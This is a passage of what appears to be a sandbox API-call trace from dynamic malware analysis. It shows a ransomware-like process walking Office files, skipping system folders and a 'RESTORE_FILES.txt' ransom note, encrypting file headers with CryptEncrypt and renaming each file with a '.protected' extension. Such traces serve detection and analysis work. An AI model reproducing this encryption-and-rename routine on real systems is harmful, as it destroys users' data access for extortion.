pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.804] 
CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.808] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll") returned 72 [0068.808] StrStrW (lpFirst="ENVELOPR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.808] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.819] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0068.820] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0068.820] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0068.820] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 
[0068.822] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0068.822] CloseHandle (hObject=0xd8) returned 1 [0068.822] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected") returned 82 [0068.822] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\ENVELOPR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\envelopr.dll.trx_dll.protected")) returned 1 [0068.823] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Windows") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0068.823] lstrcmpiW (lpString1="GRINTL32.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0068.823] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.823] StrStrIW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0068.823] lstrcmpW (lpString1="GRINTL32.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0068.823] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) 
returned 1 [0068.823] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0068.824] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0068.824] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll") returned 72 [0068.824] StrStrW (lpFirst="GRINTL32.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0068.824] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.184] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.184] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.184] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.184] 
WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.216] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.216] CloseHandle (hObject=0xd8) returned 1 [0069.217] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected") returned 82 [0069.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.dll.trx_dll.protected")) returned 1 [0069.217] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Windows") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.217] lstrcmpiW (lpString1="GRINTL32.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.218] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrIW (lpFirst="GRINTL32.REST.trx_dll", 
lpSrch=".protected") returned 0x0 [0069.218] lstrcmpW (lpString1="GRINTL32.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.218] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.218] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.218] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.218] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll") returned 73 [0069.218] StrStrW (lpFirst="GRINTL32.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.218] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.231] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.231] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.231] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.356] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.356] CloseHandle (hObject=0xd8) returned 1 [0069.357] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected") returned 83 [0069.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\GRINTL32.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\grintl32.rest.trx_dll.protected")) returned 1 [0069.357] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Windows") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.357] lstrcmpiW (lpString1="MAPIR.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.357] 
wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.357] StrStrIW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.357] lstrcmpW (lpString1="MAPIR.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.357] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.358] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.358] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.479] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.479] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.480] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.480] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.480] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll") returned 69 [0069.480] StrStrW (lpFirst="MAPIR.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.482] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.500] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: 
lpNewFilePointer=0xffffffff) returned 1 [0069.500] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.501] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.501] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.516] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.516] CloseHandle (hObject=0xd8) returned 1 [0069.517] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected") returned 79 [0069.517] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MAPIR.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mapir.dll.trx_dll.protected")) returned 1 [0069.517] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.517] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Windows") returned -1 [0069.517] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files") returned -1 [0069.518] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.518] lstrcmpiW 
(lpString1="MOR6INT.REST.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.518] lstrcmpiW (lpString1="MOR6INT.REST.trx_dll", lpString2="System Volume Information") returned -1 [0069.518] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.518] StrStrIW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".protected") returned 0x0 [0069.518] lstrcmpW (lpString1="MOR6INT.REST.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.518] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.518] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.518] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".txt") returned 0x0 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".rar") returned 0x0 [0069.519] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll") returned 72 [0069.519] StrStrW (lpFirst="MOR6INT.REST.trx_dll", lpSrch=".zip") returned 0x0 [0069.520] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: 
lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.539] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.539] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.540] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.540] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.608] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.608] CloseHandle (hObject=0xd8) returned 1 [0069.609] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected") returned 82 [0069.609] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MOR6INT.REST.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\mor6int.rest.trx_dll.protected")) returned 1 [0069.609] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0069.609] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Windows") returned -1 
[0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files") returned -1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="Program Files (x86)") returned -1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="$Recycle.bin") returned 1 [0069.610] lstrcmpiW (lpString1="MSOINTL.DLL.trx_dll", lpString2="System Volume Information") returned -1 [0069.610] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrIW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".protected") returned 0x0 [0069.610] lstrcmpW (lpString1="MSOINTL.DLL.trx_dll", lpString2="RESTORE_FILES.txt") returned -1 [0069.610] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295ec4c | out: pbBuffer=0x295ec4c) returned 1 [0069.610] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x20, dwBufLen=0x30 | out: pbData=0x4a9210*, pdwDataLen=0x295ec74*=0x30) returned 1 [0069.610] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".rar") returned 0x0 [0069.610] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll") returned 71 [0069.610] 
StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".zip") returned 0x0 [0069.610] ReadFile (in: hFile=0xd8, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.624] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.624] WriteFile (in: hFile=0xd8, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295ec94*=0x2800, lpOverlapped=0x0) returned 1 [0069.625] SetFilePointerEx (in: hFile=0xd8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.625] WriteFile (in: hFile=0xd8, lpBuffer=0x295ec6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x295ec6c*, lpNumberOfBytesWritten=0x295ec94*=0x4, lpOverlapped=0x0) returned 1 [0069.626] WriteFile (in: hFile=0xd8, lpBuffer=0x4a9210*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x4a9210*, lpNumberOfBytesWritten=0x295ec94*=0x30, lpOverlapped=0x0) returned 1 [0069.626] CloseHandle (hObject=0xd8) returned 1 [0069.627] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected") returned 81 [0069.627] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\OFFICE\\UICaptions\\3082\\MSOINTL.DLL.trx_dll.protected" (normalized: "c:\\programdata\\microsoft\\office\\uicaptions\\3082\\msointl.dll.trx_dll.protected")) returned 1 
